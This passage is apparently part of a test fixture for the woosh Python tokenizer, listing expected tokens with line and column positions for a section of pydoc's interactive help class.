woosh.Token(woosh.OP, '.', 1988, 19, 1988, 20),
woosh.Token(woosh.NAME, '_output', 1988, 20, 1988, 27),
woosh.Token(woosh.NAME, 'or', 1988, 28, 1988, 30),
woosh.Token(woosh.NAME, 'sys', 1988, 31, 1988, 34),
woosh.Token(woosh.OP, '.', 1988, 34, 1988, 35),
woosh.Token(woosh.NAME, 'stdout', 1988, 35, 1988, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1988, 41, 1989, 0),
woosh.Token(woosh.DEDENT, ' ', 1990, 0, 1990, 4),
woosh.Token(woosh.NAME, 'def', 1990, 4, 1990, 7),
woosh.Token(woosh.NAME, '__repr__', 1990, 8, 1990, 16),
woosh.Token(woosh.OP, '(', 1990, 16, 1990, 17),
woosh.Token(woosh.NAME, 'self', 1990, 17, 1990, 21),
woosh.Token(woosh.OP, ')', 1990, 21, 1990, 22),
woosh.Token(woosh.OP, ':', 1990, 22, 1990, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1990, 23, 1991, 0),
woosh.Token(woosh.INDENT, ' ', 1991, 0, 1991, 8),
woosh.Token(woosh.NAME, 'if', 1991, 8, 1991, 10),
woosh.Token(woosh.NAME, 'inspect', 1991, 11, 1991, 18),
woosh.Token(woosh.OP, '.', 1991, 18, 1991, 19),
woosh.Token(woosh.NAME, 'stack', 1991, 19, 1991, 24),
woosh.Token(woosh.OP, '(', 1991, 24, 1991, 25),
woosh.Token(woosh.OP, ')', 1991, 25, 1991, 26),
woosh.Token(woosh.OP, '[', 1991, 26, 1991, 27),
woosh.Token(woosh.NUMBER, '1', 1991, 27, 1991, 28),
woosh.Token(woosh.OP, ']', 1991, 28, 1991, 29),
woosh.Token(woosh.OP, '[', 1991, 29, 1991, 30),
woosh.Token(woosh.NUMBER, '3', 1991, 30, 1991, 31),
woosh.Token(woosh.OP, ']', 1991, 31, 1991, 32),
woosh.Token(woosh.OP, '==', 1991, 33, 1991, 35),
woosh.Token(woosh.STRING, "'?'", 1991, 36, 1991, 39),
woosh.Token(woosh.OP, ':', 1991, 39, 1991, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1991, 40, 1992, 0),
woosh.Token(woosh.INDENT, ' ', 1992, 0, 1992, 12),
woosh.Token(woosh.NAME, 'self', 1992, 12, 1992, 16),
woosh.Token(woosh.OP, '(', 1992, 16, 1992, 17),
woosh.Token(woosh.OP, ')', 1992, 17, 1992, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1992, 18, 1993, 0),
woosh.Token(woosh.NAME, 'return', 1993, 12, 1993, 18),
woosh.Token(woosh.STRING, "''", 1993, 19, 1993, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1993, 21, 1994, 0),
woosh.Token(woosh.DEDENT, ' ', 1994, 0, 1994, 8),
woosh.Token(woosh.NAME, 'return', 1994, 8, 1994, 14),
woosh.Token(woosh.STRING, "'<%s.%s instance>'", 1994, 15, 1994, 33),
woosh.Token(woosh.OP, '%', 1994, 34, 1994, 35),
woosh.Token(woosh.OP, '(', 1994, 36, 1994, 37),
woosh.Token(woosh.NAME, 'self', 1994, 37, 1994, 41),
woosh.Token(woosh.OP, '.', 1994, 41, 1994, 42),
woosh.Token(woosh.NAME, '__class__', 1994, 42, 1994, 51),
woosh.Token(woosh.OP, '.', 1994, 51, 1994, 52),
woosh.Token(woosh.NAME, '__module__', 1994, 52, 1994, 62),
woosh.Token(woosh.OP, ',', 1994, 62, 1994, 63),
woosh.Token(woosh.NAME, 'self', 1995, 37, 1995, 41),
woosh.Token(woosh.OP, '.', 1995, 41, 1995, 42),
woosh.Token(woosh.NAME, '__class__', 1995, 42, 1995, 51),
woosh.Token(woosh.OP, '.', 1995, 51, 1995, 52),
woosh.Token(woosh.NAME, '__qualname__', 1995, 52, 1995, 64),
woosh.Token(woosh.OP, ')', 1995, 64, 1995, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1995, 65, 1996, 0),
woosh.Token(woosh.DEDENT, ' ', 1997, 0, 1997, 4),
woosh.Token(woosh.NAME, '_GoInteractive', 1997, 4, 1997, 18),
woosh.Token(woosh.OP, '=', 1997, 19, 1997, 20),
woosh.Token(woosh.NAME, 'object', 1997, 21, 1997, 27),
woosh.Token(woosh.OP, '(', 1997, 27, 1997, 28),
woosh.Token(woosh.OP, ')', 1997, 28, 1997, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1997, 29, 1998, 0),
woosh.Token(woosh.NAME, 'def', 1998, 4, 1998, 7),
woosh.Token(woosh.NAME, '__call__', 1998, 8, 1998, 16),
woosh.Token(woosh.OP, '(', 1998, 16, 1998, 17),
woosh.Token(woosh.NAME, 'self', 1998, 17, 1998, 21),
woosh.Token(woosh.OP, ',', 1998, 21, 1998, 22),
woosh.Token(woosh.NAME, 'request', 1998, 23, 1998, 30),
woosh.Token(woosh.OP, '=', 1998, 30, 1998, 31),
woosh.Token(woosh.NAME, '_GoInteractive', 1998, 31, 1998, 45),
woosh.Token(woosh.OP, ')', 1998, 45, 1998, 46),
woosh.Token(woosh.OP, ':', 1998, 46, 1998, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1998, 47, 1999, 0),
woosh.Token(woosh.INDENT, ' ', 1999, 0, 1999, 8),
woosh.Token(woosh.NAME, 'if', 1999, 8, 1999, 10),
woosh.Token(woosh.NAME, 'request', 1999, 11, 1999, 18),
woosh.Token(woosh.NAME, 'is', 1999, 19, 1999, 21),
woosh.Token(woosh.NAME, 'not', 1999, 22, 1999, 25),
woosh.Token(woosh.NAME, 'self', 1999, 26, 1999, 30),
woosh.Token(woosh.OP, '.', 1999, 30, 1999, 31),
woosh.Token(woosh.NAME, '_GoInteractive', 1999, 31, 1999, 45),
woosh.Token(woosh.OP, ':', 1999, 45, 1999, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1999, 46, 2000, 0),
woosh.Token(woosh.INDENT, ' ', 2000, 0, 2000, 12),
woosh.Token(woosh.NAME, 'self', 2000, 12, 2000, 16),
woosh.Token(woosh.OP, '.', 2000, 16, 2000, 17),
woosh.Token(woosh.NAME, 'help', 2000, 17, 2000, 21),
woosh.Token(woosh.OP, '(', 2000, 21, 2000, 22),
woosh.Token(woosh.NAME, 'request', 2000, 22, 2000, 29),
woosh.Token(woosh.OP, ')', 2000, 29, 2000, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2000, 30, 2001, 0),
woosh.Token(woosh.DEDENT, ' ', 2001, 0, 2001, 8),
woosh.Token(woosh.NAME, 'else', 2001, 8, 2001, 12),
woosh.Token(woosh.OP, ':', 2001, 12, 2001, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 2001, 13, 2002, 0),
woosh.Token(woosh.INDENT, ' ', 2002, 0, 2002, 12),
woosh.Token(woosh.NAME, 'self', 2002, 12, 2002, 16),
woosh.Token(woosh.OP, '.', 2002, 16, 2002, 17),
woosh.Token(woosh.NAME, 'intro', 2002, 17, 2002, 22),
woosh.Token(woosh.OP, '(', 2002, 22, 2002, 23),
woosh.Token(woosh.OP, ')', 2002, 23, 2002, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2002, 24, 2003, 0),
woosh.Token(woosh.NAME, 'self', 2003, 12, 2003, 16),
woosh.Token(woosh.OP, '.', 2003, 16, 2003, 17),
woosh.Token(woosh.NAME, 'interact', 2003, 17, 2003, 25),
woosh.Token(woosh.OP, '(', 2003, 25, 2003, 26),
woosh.Token(woosh.OP, ')', 2003, 26, 2003, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2003, 27, 2004, 0),
woosh.Token(woosh.NAME, 'self', 2004, 12, 2004, 16),
woosh.Token(woosh.OP, '.', 2004, 16, 2004, 17),
woosh.Token(woosh.NAME, 'output', 2004, 17, 2004, 23),
woosh.Token(woosh.OP, '.', 2004, 23, 2004, 24),
woosh.Token(woosh.NAME, 'write', 2004, 24, 2004, 29),
woosh.Token(woosh.OP, '(', 2004, 29, 2004, 30),
woosh.Token(woosh.STRING, '\'\'\'\r\nYou are now leaving help and returning to the Python interpreter.\r\nIf you want to ask for help on a particular object directly from the\r\ninterpreter, you can type "help(object)". Executing "help(\'string\')"\r\nhas the same effect as typing a particular string at the help> prompt.\r\n\'\'\'', 2004, 30, 2009, 3),
woosh.Token(woosh.OP, ')', 2009, 3, 2009, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2009, 4, 2010, 0),
woosh.Token(woosh.DEDENT, ' ', 2011, 0, 2011, 4),
woosh.Token(woosh.DEDENT, '', 2011, 4, 2011, 4),
woosh.Token(woosh.NAME, 'def', 2011, 4, 2011, 7),
woosh.Token(woosh.NAME, 'interact', 2011, 8, 2011, 16),
woosh.Token(woosh.OP, '(', 2011, 16, 2011, 17),
woosh.Token(woosh.NAME, 'self', 2011, 17, 2011, 21),
woosh.Token(woosh.OP, ')', 2011, 21, 2011, 22),
woosh.Token(woosh.OP, ':', 2011, 22, 2011, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2011, 23, 2012, 0),
woosh.Token(woosh.INDENT, ' ', 2012, 0, 2012, 8),
woosh.Token(woosh.NAME, 'self', 2012, 8, 2012, 12),
woosh.Token(woosh.OP, '.', 2012, 12, 2012, 13),
woosh.Token(woosh.NAME, 'output', 2012, 13, 2012, 19),
woosh.Token(woosh.OP, '.', 2012, 19, 2012, 20),
woosh.Token(woosh.NAME, 'write', 2012, 20, 2012, 25),
woosh.Token(woosh.OP, '(', 2012, 25, 2012, 26),
woosh.Token(woosh.STRING, "'\\n'", 2012, 26, 2012, 30),
woosh.Token(woosh.OP, ')', 2012, 30, 2012, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2012, 31, 2013, 0),
woosh.Token(woosh.NAME, 'while', 2013, 8, 2013, 13),
woosh.Token(woosh.NAME, 'True', 2013, 14, 2013, 18),
woosh.Token(woosh.OP, ':', 2013, 18, 2013, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 2013, 19, 2014, 0),
woosh.Token(woosh.INDENT, ' ', 2014, 0, 2014, 12),
woosh.Token(woosh.NAME, 'try', 2014, 12, 2014, 15),
woosh.Token(woosh.OP, ':', 2014, 15, 2014, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2014, 16, 2015, 0),
woosh.Token(woosh.INDENT, ' ', 2015, 0, 2015, 16),
woosh.Token(woosh.NAME, 'request', 2015, 16, 2015, 23),
woosh.Token(woosh.OP, '=', 2015, 24, 2015, 25),
woosh.Token(woosh.NAME, 'self', 2015, 26, 2015, 30),
woosh.Token(woosh.OP, '.', 2015, 30, 2015, 31),
woosh.Token(woosh.NAME, 'getline', 2015, 31, 2015, 38),
woosh.Token(woosh.OP, '(', 2015, 38, 2015, 39),
woosh.Token(woosh.STRING, "'help> '", 2015, 39, 2015, 47),
woosh.Token(woosh.OP, ')', 2015, 47, 2015, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2015, 48, 2016, 0),
woosh.Token(woosh.NAME, 'if', 2016, 16, 2016, 18),
woosh.Token(woosh.NAME, 'not', 2016, 19, 2016, 22),
woosh.Token(woosh.NAME, 'request', 2016, 23, 2016, 30),
woosh.Token(woosh.OP, ':', 2016, 30, 2016, 31),
woosh.Token(woosh.NAME, 'break', 2016, 32, 2016, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2016, 37, 2017, 0),
woosh.Token(woosh.DEDENT, ' ', 2017, 0, 2017, 12),
woosh.Token(woosh.NAME, 'except', 2017, 12, 2017, 18),
woosh.Token(woosh.OP, '(', 2017, 19, 2017, 20),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 2017, 20, 2017, 37),
woosh.Token(woosh.OP, ',', 2017, 37, 2017, 38),
woosh.Token(woosh.NAME, 'EOFError', 2017, 39, 2017, 47),
woosh.Token(woosh.OP, ')', 2017, 47, 2017, 48),
woosh.Token(woosh.OP, ':', 2017, 48, 2017, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2017, 49, 2018, 0),
woosh.Token(woosh.INDENT, ' ', 2018, 0, 2018, 16),
woosh.Token(woosh.NAME, 'break', 2018, 16, 2018, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2018, 21, 2019, 0),
woosh.Token(woosh.DEDENT, ' ', 2019, 0, 2019, 12),
woosh.Token(woosh.NAME, 'request', 2019, 12, 2019, 19),
woosh.Token(woosh.OP, '=', 2019, 20, 2019, 21),
woosh.Token(woosh.NAME, 'request', 2019, 22, 2019, 29),
woosh.Token(woosh.OP, '.', 2019, 29, 2019, 30),
woosh.Token(woosh.NAME, 'strip', 2019, 30, 2019, 35),
woosh.Token(woosh.OP, '(', 2019, 35, 2019, 36),
woosh.Token(woosh.OP, ')', 2019, 36, 2019, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2019, 37, 2020, 0),
woosh.Token(woosh.COMMENT, "# Make sure significant trailing quoting marks of literals don't", 2021, 12, 2021, 76),
woosh.Token(woosh.COMMENT, '# get deleted while cleaning input', 2022, 12, 2022, 46),
woosh.Token(woosh.NAME, 'if', 2023, 12, 2023, 14),
woosh.Token(woosh.OP, '(', 2023, 15, 2023, 16),
woosh.Token(woosh.NAME, 'len', 2023, 16, 2023, 19),
woosh.Token(woosh.OP, '(', 2023, 19, 2023, 20),
woosh.Token(woosh.NAME, 'request', 2023, 20, 2023, 27),
woosh.Token(woosh.OP, ')', 2023, 27, 2023, 28),
woosh.Token(woosh.OP, '>', 2023, 29, 2023, 30),
woosh.Token(woosh.NUMBER, '2', 2023, 31, 2023, 32),
woosh.Token(woosh.NAME, 'and', 2023, 33, 2023, 36),
woosh.Token(woosh.NAME, 'request', 2023, 37, 2023, 44),
woosh.Token(woosh.OP, '[', 2023, 44, 2023, 45),
woosh.Token(woosh.NUMBER, '0', 2023, 45, 2023, 46),
woosh.Token(woosh.OP, ']', 2023, 46, 2023, 47),
woosh.Token(woosh.OP, '==', 2023, 48, 2023, 50),
woosh.Token(woosh.NAME, 'request', 2023, 51, 2023, 58),
woosh.Token(woosh.OP, '[', 2023, 58, 2023, 59),
woosh.Token(woosh.OP, '-', 2023, 59, 2023, 60),
woosh.Token(woosh.NUMBER, '1', 2023, 60, 2023, 61),
woosh.Token(woosh.OP, ']', 2023, 61, 2023, 62),
woosh.Token(woosh.NAME, 'in', 2023, 63, 2023, 65),
woosh.Token(woosh.OP, '(', 2023, 66, 2023, 67),
woosh.Token(woosh.STRING, '"\'"', 2023, 67, 2023, 70),
woosh.Token(woosh.OP, ',', 2023, 70, 2023, 71),
woosh.Token(woosh.STRING, '\'"\'', 2023, 72, 2023, 75),
woosh.Token(woosh.OP, ')', 2023, 75, 2023, 76),
woosh.Token(woosh.NAME, 'and', 2024, 20, 2024, 23),
woosh.Token(woosh.NAME, 'request', 2024, 24, 2024, 31),
woosh.Token(woosh.OP, '[', 2024, 31, 2024, 32),
woosh.Token(woosh.NUMBER, '0', 2024, 32, 2024, 33),
woosh.Token(woosh.OP, ']', 2024, 33, 2024, 34),
woosh.Token(woosh.NAME, 'not', 2024, 35, 2024, 38),
woosh.Token(woosh.NAME, 'in', 2024, 39, 2024, 41),
woosh.Token(woosh.NAME, 'request', 2024, 42, 2024, 49),
woosh.Token(woosh.OP, '[', 2024, 49, 2024, 50),
woosh.Token(woosh.NUMBER, '1', 2024, 50, 2024, 51),
woosh.Token(woosh.OP, ':', 2024, 51, 2024, 52),
woosh.Token(woosh.OP, '-', 2024, 52, 2024, 53),
woosh.Token(woosh.NUMBER, '1', 2024, 53, 2024, 54),
woosh.Token(woosh.OP, ']', 2024, 54, 2024, 55),
woosh.Token(woosh.OP, ')', 2024, 55, 2024, 56),
woosh.Token(woosh.OP, ':', 2024, 56, 2024, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2024, 57, 2025, 0),
woosh.Token(woosh.INDENT, ' ', 2025, 0, 2025, 16),
woosh.Token(woosh.NAME, 'request', 2025, 16, 2025, 23),
woosh.Token(woosh.OP, '=', 2025, 24, 2025, 25),
woosh.Token(woosh.NAME, 'request', 2025, 26, 2025, 33),
woosh.Token(woosh.OP, '[', 2025, 33, 2025, 34),
woosh.Token(woosh.NUMBER, '1', 2025, 34, 2025, 35),
woosh.Token(woosh.OP, ':', 2025, 35, 2025, 36),
woosh.Token(woosh.OP, '-', 2025, 36, 2025, 37),
woosh.Token(woosh.NUMBER, '1', 2025, 37, 2025, 38),
woosh.Token(woosh.OP, ']', 2025, 38, 2025, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2025, 39, 2026, 0),
woosh.Token(woosh.DEDENT, ' ', 2026, 0, 2026, 12),
woosh.Token(woosh.NAME, 'if', 2026, 12, 2026, 14),
woosh.Token(woosh.NAME, 'request', 2026, 15, 2026, 22),
woosh.Token(woosh.OP, '.', 2026, 22, 2026, 23),
woosh.Token(woosh.NAME, 'lower', 2026, 23, 2026, 28),
woosh.Token(woosh.OP, '(', 2026, 28, 2026, 29),
woosh.Token(woosh.OP, ')', 2026, 29, 2026, 30),
woosh.Token(woosh.NAME, 'in', 2026, 31, 2026, 33),
woosh.Token(woosh.OP, '(', 2026, 34, 2026, 35),
woosh.Token(woosh.STRING, "'q'", 2026, 35, 2026, 38),
woosh.Token(woosh.OP, ',', 2026, 38, 2026, 39),
woosh.Token(woosh.STRING, "'quit'", 2026, 40, 2026, 46),
woosh.Token(woosh.OP, ')', 2026, 46, 2026, 47),
woosh.Token(woosh.OP, ':', 2026, 47, 2026, 48),
woosh.Token(woosh.NAME, 'break', 2026, 49, 2026, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2026, 54, 2027, 0),
woosh.Token(woosh.NAME, 'if', 2027, 12, 2027, 14),
woosh.Token(woosh.NAME, 'request', 2027, 15, 2027, 22),
woosh.Token(woosh.OP, '==', 2027, 23, 2027, 25),
woosh.Token(woosh.STRING, "'help'", 2027, 26, 2027, 32),
woosh.Token(woosh.OP, ':', 2027, 32, 2027, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2027, 33, 2028, 0),
woosh.Token(woosh.INDENT, ' ', 2028, 0, 2028, 16),
woosh.Token(woosh.NAME, 'self', 2028, 16, 2028, 20),
woosh.Token(woosh.OP, '.', 2028, 20, 2028, 21),
woosh.Token(woosh.NAME, 'intro', 2028, 21, 2028, 26),
woosh.Token(woosh.OP, '(', 2028, 26, 2028, 27),
woosh.Token(woosh.OP, ')', 2028, 27, 2028, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2028, 28, 2029, 0),
woosh.Token(woosh.DEDENT, ' ', 2029, 0, 2029, 12),
woosh.Token(woosh.NAME, 'else', 2029, 12, 2029, 16),
woosh.Token(woosh.OP, ':', 2029, 16, 2029, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2029, 17, 2030, 0),
woosh.Token(woosh.INDENT, ' ', 2030, 0, 2030, 16),
woosh.Token(woosh.NAME, 'self', 2030, 16, 2030, 20),
woosh.Token(woosh.OP, '.', 2030, 20, 2030, 21),
woosh.Token(woosh.NAME, 'help', 2030, 21, 2030, 25),
woosh.Token(woosh.OP, '(', 2030, 25, 2030, 26),
woosh.Token(woosh.NAME, 'request', 2030, 26, 2030, 33),
woosh.Token(woosh.OP, ')', 2030, 33, 2030, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2030, 34, 2031, 0),
woosh.Token(woosh.DEDENT, ' ', 2032, 0, 2032, 4),
woosh.Token(woosh.DEDENT, '', 2032, 4, 2032, 4),
woosh.Token(woosh.DEDENT, '', 2032, 4, 2032, 4),
woosh.Token(woosh.NAME, 'def', 2032, 4, 2032, 7),
woosh.Token(woosh.NAME, 'getline', 2032, 8, 2032, 15),
woosh.Token(woosh.OP, '(', 2032, 15, 2032, 16),
woosh.Token(woosh.NAME, 'self', 2032, 16, 2032, 20),
woosh.Token(woosh.OP, ',', 2032, 20, 2032, 21),
woosh.Token(woosh.NAME, 'prompt', 2032, 22, 2032, 28),
woosh.Token(woosh.OP, ')', 2032, 28, 2032, 29),
woosh.Token(woosh.OP, ':', 2032, 29, 2032, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2032, 30, 2033, 0),
woosh.Token(woosh.INDENT, ' ', 2033, 0, 2033, 8),
woosh.Token(woosh.STRING, '"""Read one line, using input() when appropriate."""', 2033, 8, 2033, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2033, 60, 2034, 0),
woosh.Token(woosh.NAME, 'if', 2034, 8, 2034, 10),
woosh.Token(woosh.NAME, 'self', 2034, 11, 2034, 15),
woosh.Token(woosh.OP, '.', 2034, 15, 2034, 16),
woosh.Token(woosh.NAME, 'input', 2034, 16, 2034, 21),
woosh.Token(woosh.NAME, 'is', 2034, 22, 2034, 24),
woosh.Token(woosh.NAME, 'sys', 2034, 25, 2034, 28),
woosh.Token(woosh.OP, '.', 2034, 28, 2034, 29),
woosh.Token(woosh.NAME, 'stdin', 2034, 29, 2034, 34),
woosh.Token(woosh.OP, ':', 2034, 34, 2034, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2034, 35, 2035, 0),
woosh.Token(woosh.INDENT, ' ', 2035, 0, 2035, 12),
woosh.Token(woosh.NAME, 'return', 2035, 12, 2035, 18),
woosh.Token(woosh.NAME, 'input', 2035, 19, 2035, 24),
woosh.Token(woosh.OP, '(', 2035, 24, 2035, 25),
woosh.Token(woosh.NAME, 'prompt', 2035, 25, 2035, 31),
woosh.Token(woosh.OP, ')', 2035, 31, 2035, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2035, 32, 2036, 0),
woosh.Token(woosh.DEDENT, ' ', 2036, 0, 2036, 8),
woosh.Token(woosh.NAME, 'else', 2036, 8, 2036, 12),
woosh.Token(woosh.OP, ':', 2036, 12, 2036, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 2036, 13, 2037, 0),
woosh.Token(woosh.INDENT, ' ', 2037, 0, 2037, 12),
woosh.Token(woosh.NAME, 'self', 2037, 12, 2037, 16),
woosh.Token(woosh.OP, '.', 2037, 16, 2037, 17),
woosh.Token(woosh.NAME, 'output', 2037, 17, 2037, 23),
woosh.Token(woosh.OP, '.', 2037, 23, 2037, 24),
woosh.Token(woosh.NAME, 'write', 2037, 24, 2037, 29),
woosh.Token(woosh.OP, '(', 2037, 29, 2037, 30),
woosh.Token(woosh.NAME, 'prompt', 2037, 30, 2037, 36),
woosh.Token(woosh.OP, ')', 2037, 36, 2037, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2037, 37, 2038, 0),
woosh.Token(woosh.NAME, 'self', 2038, 12, 2038, 16),
woosh.Token(woosh.OP, '.', 2038, 16, 2038, 17),
woosh.Token(woosh.NAME, 'output', 2038, 17, 2038, 23),
woosh.Token(woosh.OP, '.', 2038, 23, 2038, 24),
woosh.Token(woosh.NAME, 'flush', 2038, 24, 2038, 29),
woosh.Token(woosh.OP, '(', 2038, 29, 2038, 30),
woosh.Token(woosh.OP, ')', 2038, 30, 2038, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2038, 31, 2039, 0),
woosh.Token(woosh.NAME, 'return', 2039, 12, 2039, 18),
woosh.Token(woosh.NAME, 'self', 2039, 19, 2039, 23),
woosh.Token(woosh.OP, '.', 2039, 23, 2039, 24),
woosh.Token(woosh.NAME, 'input', 2039, 24, 2039, 29),
woosh.Token(woosh.OP, '.', 2039, 29, 2039, 30),
woosh.Token(woosh.NAME, 'readline', 2039, 30, 2039, 38),
woosh.Token(woosh.OP, '(', 2039, 38, 2039, 39),
woosh.Token(woosh.OP, ')', 2039, 39, 2039, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2039, 40, 2040, 0),
woosh.Token(woosh.DEDENT, ' ', 2041, 0, 2041, 4),
woosh.Token(woosh.DEDENT, '', 2041, 4, 2041, 4),
woosh.Token(woosh.NAME, 'def', 2041, 4, 2041, 7),
woosh.Token(woosh.NAME, 'help', 2041, 8, 2041, 12),
woosh.Token(woosh.OP, '(', 2041, 12, 2041, 13),
woosh.Token(woosh.NAME, 'self', 2041, 13, 2041, 17),
woosh.Token(woosh.OP, ',', 2041, 17, 2041, 18),
woosh.Token(woosh.NAME, 'request', 2041, 19, 2041, 26),
woosh.Token(woosh.OP, ')', 2041, 26, 2041, 27),
woosh.Token(woosh.OP, ':', 2041, 27, 2041, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2041, 28, 2042, 0),
woosh.Token(woosh.INDENT, ' ', 2042, 0, 2042, 8),
woosh.Token(woosh.NAME, 'if', 2042, 8, 2042, 10),
woosh.Token(woosh.NAME, 'type', 2042, 11, 2042, 15),
woosh.Token(woosh.OP, '(', 2042, 15, 2042, 16),
woosh.Token(woosh.NAME, 'request', 2042, 16, 2042, 23),
woosh.Token(woosh.OP, ')', 2042, 23, 2042, 24),
woosh.Token(woosh.NAME, 'is', 2042, 25, 2042, 27),
woosh.Token(woosh.NAME, 'type', 2042, 28, 2042, 32),
woosh.Token(woosh.OP, '(', 2042, 32, 2042, 33),
woosh.Token(woosh.STRING, "''", 2042, 33, 2042, 35),
woosh.Token(woosh.OP, ')', 2042, 35, 2042, 36),
woosh.Token(woosh.OP, ':', 2042, 36, 2042, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2042, 37, 2043, 0),
woosh.Token(woosh.INDENT, ' ', 2043, 0, 2043, 12),
woosh.Token(woosh.NAME, 'request', 2043, 12, 2043, 19),
woosh.Token(woosh.OP, '=', 2043, 20, 2043, 21),
woosh.Token(woosh.NAME, 'request', 2043, 22, 2043, 29),
woosh.Token(woosh.OP, '.', 2043, 29, 2043, 30),
woosh.Token(woosh.NAME, 'strip', 2043, 30, 2043, 35),
woosh.Token(woosh.OP, '(', 2043, 35, 2043, 36),
woosh.Token(woosh.OP, ')', 2043, 36, 2043, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2043, 37, 2044, 0),
woosh.Token(woosh.NAME, 'if', 2044, 12, 2044, 14),
woosh.Token(woosh.NAME, 'request', 2044, 15, 2044, 22),
woosh.Token(woosh.OP, '==', 2044, 23, 2044, 25),
woosh.Token(woosh.STRING, "'keywords'", 2044, 26, 2044, 36),
woosh.Token(woosh.OP, ':', 2044, 36, 2044, 37),
woosh.Token(woosh.NAME, 'self', 2044, 38, 2044, 42),
woosh.Token(woosh.OP, '.', 2044, 42, 2044, 43),
woosh.Token(woosh.NAME, 'listkeywords', 2044, 43, 2044, 55),
woosh.Token(woosh.OP, '(', 2044, 55, 2044, 56),
woosh.Token(woosh.OP, ')', 2044, 56, 2044, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2044, 57, 2045, 0),
woosh.Token(woosh.NAME, 'elif', 2045, 12, 2045, 16),
woosh.Token(woosh.NAME, 'request', 2045, 17, 2045, 24),
woosh.Token(woosh.OP, '==', 2045, 25, 2045, 27),
woosh.Token(woosh.STRING, "'symbols'", 2045, 28, 2045, 37),
woosh.Token(woosh.OP, ':', 2045, 37, 2045, 38),
woosh.Token(woosh.NAME, 'self', 2045, 39, 2045, 43),
woosh.Token(woosh.OP, '.', 2045, 43, 2045, 44),
woosh.Token(woosh.NAME, 'listsymbols', 2045, 44, 2045, 55),
woosh.Token(woosh.OP, '(', 2045, 55, 2045, 56),
woosh.Token(woosh.OP, ')', 2045, 56, 2045, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2045, 57, 2046, 0),
woosh.Token(woosh.NAME, 'elif', 2046, 12, 2046, 16),
woosh.Token(woosh.NAME, 'request', 2046, 17, 2046, 24),
woosh.Token(woosh.OP, '==', 2046, 25, 2046, 27),
woosh.Token(woosh.STRING, "'topics'", 2046, 28, 2046, 36),
woosh.Token(woosh.OP, ':', 2046, 36, 2046, 37),
woosh.Token(woosh.NAME, 'self', 2046, 38, 2046, 42),
woosh.Token(woosh.OP, '.', 2046, 42, 2046, 43),
woosh.Token(woosh.NAME, 'listtopics', 2046, 43, 2046, 53),
woosh.Token(woosh.OP, '(', 2046, 53, 2046, 54),
woosh.Token(woosh.OP, ')', 2046, 54, 2046, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2046, 55, 2047, 0),
woosh.Token(woosh.NAME, 'elif', 2047, 12, 2047, 16),
woosh.Token(woosh.NAME, 'request', 2047, 17, 2047, 24),
woosh.Token(woosh.OP, '==', 2047, 25, 2047, 27),
woosh.Token(woosh.STRING, "'modules'", 2047, 28, 2047, 37),
woosh.Token(woosh.OP, ':', 2047, 37, 2047, 38),
woosh.Token(woosh.NAME, 'self', 2047, 39, 2047, 43),
woosh.Token(woosh.OP, '.', 2047, 43, 2047, 44),
woosh.Token(woosh.NAME, 'listmodules', 2047, 44, 2047, 55),
woosh.Token(woosh.OP, '(', 2047, 55, 2047, 56),
woosh.Token(woosh.OP, ')', 2047, 56, 2047, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2047, 57, 2048, 0),
woosh.Token(woosh.NAME, 'elif', 2048, 12, 2048, 16),
woosh.Token(woosh.NAME, 'request', 2048, 17, 2048, 24),
woosh.Token(woosh.OP, '[', 2048, 24, 2048, 25),
woosh.Token(woosh.OP, ':', 2048, 25, 2048, 26),
woosh.Token(woosh.NUMBER, '8', 2048, 26, 2048, 27),
woosh.Token(woosh.OP, ']', 2048, 27, 2048, 28),
woosh.Token(woosh.OP, '==', 2048, 29, 2048, 31),
woosh.Token(woosh.STRING, "'modules '", 2048, 32, 2048, 42),
woosh.Token(woosh.OP, ':', 2048, 42, 2048, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2048, 43, 2049, 0),
woosh.Token(woosh.INDENT, ' ', 2049, 0, 2049, 16),
woosh.Token(woosh.NAME, 'self', 2049, 16, 2049, 20),
woosh.Token(woosh.OP, '.', 2049, 20, 2049, 21),
woosh.Token(woosh.NAME, 'listmodules', 2049, 21, 2049, 32),
